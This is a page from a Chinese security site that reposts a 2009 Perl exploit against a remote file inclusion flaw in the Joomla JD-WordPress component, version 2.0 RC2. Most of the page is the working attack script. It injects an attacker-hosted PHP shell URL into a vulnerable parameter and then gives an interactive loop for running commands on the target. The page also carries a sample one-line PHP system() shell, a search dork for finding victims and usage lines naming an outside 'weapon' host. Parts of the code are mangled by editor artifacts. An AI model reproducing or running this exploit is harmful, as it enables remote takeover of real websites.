首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla JD-WordPress remote file inclusion exploit. Version 2.0 RC2 is affected
来源:http://www.indonesiancoder.com 作者:Tukulesto 发布时间:2009-10-20  
#!/usr/bin/perl

#####
# [+] Author	: Don Tukulesto (root@indonesiancoder.com)
# [+] Date 	: October 20, 2009
# [+] Homepage	: http://www.indonesiancoder.com
# [+] Vendor 	: www.joomladeveloping.org
# [+] version 	: 2.0 RC2
# [+] Method	: Remote File Inclusion 
# [+] Dork 	: "Kill-9"+"IndonesianCoder"
# [+] Location 	: INDONESIA
# [~] Notes	: Jika kami bersama, Nyalakan tanda bahaya. Jika kami berpesta, Hening akan terpecah.
# Aku dia dan mereka, Memang gila memang beda. Tak perlu berpura pura, Memang begini adanya. ( SupermanIsDead ft. Shaggy Dog )
# to M3NW5	: Kembalilah ke jalan mu nak, jangan berpaling dari "Nya"
# to kaMtiEz	: thx yah !!!! � 15 Jam dapet hasil jg :"> ( tunggulah aku di kotamu )
# to MALINGSIAL	: TRULLY THIEF IN ASIA ! N.A.T.O BIATCH !
# [~] How To	:
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system(
___FCKpd___0
GET['cmd']); ?> ##### use HTTP::Request; use LWP::UserAgent; $Tux = $ARGV[0]; $Pathloader = $ARGV[1]; $Contrex = $ARGV[2]; if($Tux!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()} head(); sub head() { print "[o]============================================================================[o]\r\n"; print " | Joomla JD-WordPress Vulnerability File Inclusion |\r\n"; print "[o]============================================================================[o]\r\n"; } while() { print "[w00t] \___FCKpd___0quot;; while(<STDIN>) { $kaMtiEz=
___FCKpd___0
; chomp($kaMtiEz); $arianom = LWP::UserAgent->new() or die; $tiw0L = HTTP::Request->new(GET =>$Tux.'components/com_jd-wp/wp-feed.php?mosConfig_absolute_path='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n"; $abah_benu = $arianom->request($tiw0L); $tukulesto = $abah_benu->content; $tukulesto =~ tr/[\n]/[�]/; if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";} elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /) {print "\nCann't Connect to cmd Host or Invalid Command\n";exit} elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} if($tukulesto =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[�]/[\n]/; print "\r\n$finreturn\n\r"; last; } else {print "[w00t] \___FCKpd___0quot;;}}}last; sub usage() { head(); print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n"; print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n"; print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n"; print " | <cmd> - Command variable used in php shell |\r\n"; print "[o]============================================================================[o]\r\n"; print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n"; print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n"; print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n"; print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n"; print "[o]============================================================================[o]\r\n"; print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n"; print "[o]============================================================================[o]\r\n"; exit(); }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MiniShare HTTP Server 1.5.5 Re
·EMC RepliStor Server (rep_serv
·CVE-2009-3692 Sun VirtualBox <
·Websense Email Security Web Ad
·Xpdf - Integer overflow which
·Websense Email Security Cross
·HTTPDX h_handlepeer() Function
·Alleycode HTML Editor 2.21 Loc
·GPG2/Kleopatra 2.0.11 - Malfor
·Spider Solitaire local crash p
·Millenium MP3 Studio version 2
·Xion Audio Player local buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved